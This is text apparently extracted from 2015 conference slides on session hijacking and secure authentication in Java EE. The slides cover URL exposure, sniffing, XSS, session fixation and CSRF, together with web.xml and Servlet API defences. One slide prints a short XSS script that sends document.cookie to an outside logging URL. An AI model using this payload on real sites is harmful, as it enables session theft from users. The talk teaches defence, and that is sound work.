Secure Authentication and Session Management in Java EE

Secure Authen+ca+on and
Session Management
in Java EE
Patrycja Wegrzynowicz
CTO, Yonita, Inc.
Java Day Kiev 2015

(c) Patrycja Wegrzynowicz
@yonlabs
About Me
• 15+ professional experience
• SoQware engineer, architect, head of soQware R&D
• Author and speaker
• JavaOne, Devoxx, JavaZone, TheServerSide Java Symposium, Jazoon, OOPSLA, ASE,
others
• Finalizing PhD in Computer Science
• Founder and CTO of Yonita
• Bridge the gap between the industry and the academia
• Automated detec+on and refactoring of soQware defects
• Trainings and code reviews
• Security, performance, concurrency, databases
• TwiYer: @yonlabs

@yonlabs
Agenda
• HTTP, session, OWASP
• 4 demos to hijack a session
• Best prac+ces in Java EE

@yonlabs
Security Stories 2014/2015
#!/bin/bash

@yonlabs
HTTP

@yonlabs
What is Web Session?
• Session iden+fies interac+ons with one user
• Unique iden+fier associated with every request
• Cookie
• Header
• Parameter
• Hidden field

@yonlabs
OWASP Top 10 Risks

@yonlabs
Session Hijacking
• Session theQ
• URL, sniﬃng, logs, XSS
• Session ﬁxa+on
• Session predic+on

@yonlabs
Demo: Session Exposed in URL
• I will log into the sample applica+on
• I will post a link with my session id on TwiYer
• @yonlabs
• Hijack my session :)

@yonlabs
How to Avoid Session Id in URL?
• Default: allows cookies and URL rewri+ng
• Default cookie, fall back on URL rewri+ng
• To embrace all users
• Disabled cookies in a browser
• Disable URL rewri+ng in an app server
• App server speciﬁc
• Tracking mode
• Java EE 6, web.xml

@yonlabs
web.xml

<session-conﬁg>
<tracking-mode>COOKIE</tracking-mode>
</session-conﬁg>

@yonlabs
Session Sniffing
• How to find out a cookie?
• e.g., network monitoring and packet sniffing
• How to use a cookie?
• Browsers’ plugins and add-ons (e.g., Cookie Manager for Firefox)
• Intercep+ng proxy (e.g., OWASP ZAP)
• DIY: write your own code

@yonlabs
Demo: Session Sniﬃng
• You will log into the sample applica+on
• Any non empty user name
• Please, use meaningful names, the vic+m will get a geecoin!
• I will monitor network traﬃc
• tcpdump
• I will hijack one of your sessions
• Cookie Manager

@yonlabs
How to Avoid Session
Exposure During Transport?

@yonlabs
How to Avoid Session Exposure
During Transport?
Encrypt! Use HTTPS.

@yonlabs
web.xml
<security-constraint>
<user-data-constraint>
<transport-guarantee>
CONFIDENTIAL
</transport-guarantee>
</user-data-constraint>
</security-constraint>

@yonlabs
web.xml
<session-config>
<cookie-config>
<secure>true</secure>
</cookie-config>
</session-config>

@yonlabs
Session Exposure
• Transport
• Unencrypted transport
• Client-side
• XSS
• AYacks on browsers/OS
• Server-side
• Logs
• Session replica+on
• Memory dump

@yonlabs
How to Steal a Session if
Secure Transport Is Used?

@yonlabs
How to Steal a Session if Secure
Transport Is Used?
A3ack a client!

@yonlabs
Demo: Session Grabbed by XSS
• JavaScript code to steal a cookie
• Servlet to log down stolen cookies
• Vulnerable applica+on to be exploited via injected
JavaScript code (XSS)

@yonlabs
Demo: Session Grabbed by XSS
• I will store malicious JavaScript code in the app
• Through wri+ng an “opinion”
• Log into the vulnerable applica+on
• hYps://demo.yonita.com:8181/session-xss/
• Please, use meaningful names, the vic+m will get a geecoin!
• Click ‚View others opinions’ page
• Wait un+l I will hijack your session :)

@yonlabs
JavaScript to Steal a Cookie
<script>

theQ = ’hYp://demo.yonita.com/steal/steal?cookie=’

image = new Image();
image.src = theQ + document.cookie;
</script>

@yonlabs
web.xml
<session-config>
<cookie-config>
<hYp-only>true</hYp-only>
<secure>true</secure>
</cookie-config>
</session-config>

@yonlabs
Session Fixa+on: Scenario
• Hacker opens a web page of a system in a browser
• New session ini+alized
• Hacker writes down the session id
• Hacker leaves the browser open
• User comes and logs into the app
• Uses the session ini+alized by the hacker
• Hacker uses the wriYen down session id to hijack the
user’s session

@yonlabs
Session Fixa+on: Solu+on
• Change the session ID aQer a successful login
• more generally: escala+on of privileges
• Java EE 7 (Servlet 3.1)
• HYpServletRequest.changeSessionId()
• Java EE 6 
– HYpSession.invalidate() 
– HYpServletRequest.getSession(true)

@yonlabs
Secure Session Management
Best Prac+ces
• Random, unpredictable session id
• At least 16 characters
• Secure transport and storage of session id
• Cookie preferred over URL rewri+ng
• Cookie ﬂags: secure, hYpOnly
• Consistent use of HTTPS (How to serve sta+c content?)
• Don’t mix HTTP and HTTPS under the same  
domain/cookie path
• Don’t use too broad cookie paths

@yonlabs
Secure Authen+ca+on
Best Prac+ces
• Session crea+on and destruc+on
• New session id aQer login
• Logout buYon
• Session +meouts: 2”-5” for cri+cal apps, 15”-30” for  
typical apps
• Session associated with the headers of the ﬁrst
request
• IP, User-Agent,…
• If they don’t match, something’s going on (invalidate!)

@yonlabs
Secure Authen+ca+on
Best Prac+ces cont.
• Java EE
• Declara+ve authen+ca+on implemented using annota+ons or
descriptors
• Does not force new session id aQer login (session fixa+on possible,
app server specific)
• Programma+c authen+ca+on
• Java EE 7, Servlet 3.1
• HYpServletRequest: authen+cate, login, logout
• Advanced flows and requirements

@yonlabs
Secure Authen+ca+on
Best Prac+ces cont.
• My choice
• Programma+c authen+ca+on with Java EE 7
• HYpServletRequest: authen+cate, login, logout
• Declara+ve authoriza+on
• web.xml
• @RolesAllowed, @PermitAll, @DenyAll

@yonlabs
What If We Can’t Steal a
Cookie?

@yonlabs
What If We Can’t Steal a
Cookie?
We can s9ll use it!

@yonlabs
Demo: CSRF to Use a Cookie
• I will log into the applica+on
• Log into the applica+on
• hYps://demo.yonita.com:8181/session-csrf/
• Please, use meaningful names, the ﬁrst vic+m will get a geecoin!
• Click the link and the buYon ‘Click me’
• hYps://demo.yonita.com:8181/aYack-csrf/
• I will check my account balance :)

@yonlabs
CSRF: Solu+on
• Unique token associated with each form
• Java EE (JSF): turned on by default
• Any other modern framework
• Remember about REST/other services

@yonlabs
Conclusion
You are never safe!

@yonlabs
Con+nuous Integra+on

@yonlabs
Con+nuous Refactoring

@yonlabs
Con+nuous Learning!

@yonlabs
Con+nuous Learning
A fool with a tool is s9ll a fool!

@yonlabs
Q&A
• patrycja@yonita.com
• TwiYer: @yonlabs
• Upcoming trainings: How to
a3ack and secure web apps in
Java?
Warszawa 15-16.12.2015

Secure Authentication and Session Management in Java EE

More Related Content

What's hot

Viewers also liked

Recently uploaded

Secure Authentication and Session Management in Java EE